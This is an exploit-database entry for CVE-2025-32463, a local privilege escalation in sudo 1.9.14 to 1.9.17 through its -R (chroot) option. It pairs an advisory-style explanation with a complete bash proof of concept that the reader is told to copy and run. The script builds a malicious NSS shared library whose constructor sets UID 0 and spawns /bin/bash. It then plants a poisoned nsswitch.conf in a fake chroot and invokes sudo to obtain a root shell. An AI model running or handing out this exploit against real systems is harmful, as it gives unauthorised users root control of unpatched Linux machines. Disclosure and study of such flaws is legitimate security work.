Exploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation
Google Dork: not aplicable
Date: Mon, 30 Jun 2025
Exploit Author: Stratascale
Vendor Homepage:https://salsa.debian.org/sudo-team/sudo
Software Link:
Version: Sudo versions 1.9.14 to 1.9.17 inclusive
Tested on: Kali Rolling 2025-7-3
CVE : CVE-2025-32463
*Version running today in Kali:*
https://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/
*Background*
An attacker can leverage sudo's -R (--chroot) option to run
arbitrary commands as root, even if they are not listed in the
sudoers file.
Sudo versions affected:
Sudo versions 1.9.14 to 1.9.17 inclusive are affected.
CVE ID:
This vulnerability has been assigned CVE-2025-32463 in the
Common Vulnerabilities and Exposures database.
Details:
Sudo's -R (--chroot) option is intended to allow the user to
run a command with a user-selected root directory if the sudoers
file allows it. A change was made in sudo 1.9.14 to resolve
paths via chroot() using the user-specified root directory while
the sudoers file was still being evaluated. It is possible for
an attacker to trick sudo into loading an arbitrary shared
library by creating an /etc/nsswitch.conf file under the
user-specified root directory.
The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1
and the chroot feature has been marked as deprecated. It will
be removed entirely in a future sudo release. Because of the
way sudo resolves commands, supporting a user-specified chroot
directory is error-prone and this feature does not appear to
be widely used.
A more detailed description of the bug and its effects can be
found in the Stratascale advisory:
https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Impact:
On systems that support /etc/nsswitch.conf a user may be able
to run arbitrary commands as root.
*Exploit:*
*Verify the sudo version running: sudo --versionIf is vulnerable, copy and
paste the following code and run it.*
*----------------------*
#!/bin/bash
# sudo-chwoot.sh – PoC CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
# 1. NSS library
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void woot(void) {
setreuid(0,0); /* change to UID 0 */
setregid(0,0); /* change to GID 0 */
chdir("/"); /* exit from chroot */
execl("/bin/bash","/bin/bash",NULL); /* root shell */
}
EOF
# 2. Mini chroot with toxic nsswitch.conf
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc # make getgrnam() not fail
# 3. compile libnss_
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "[*] Running exploit…"
sudo -R woot woot # (-R <dir> <cmd>)
# • the first “woot” is chroot
# • the second “woot” is and inexistent
command
# (only needs resolve the user)
rm -rf "$STAGE"
*----------------------*
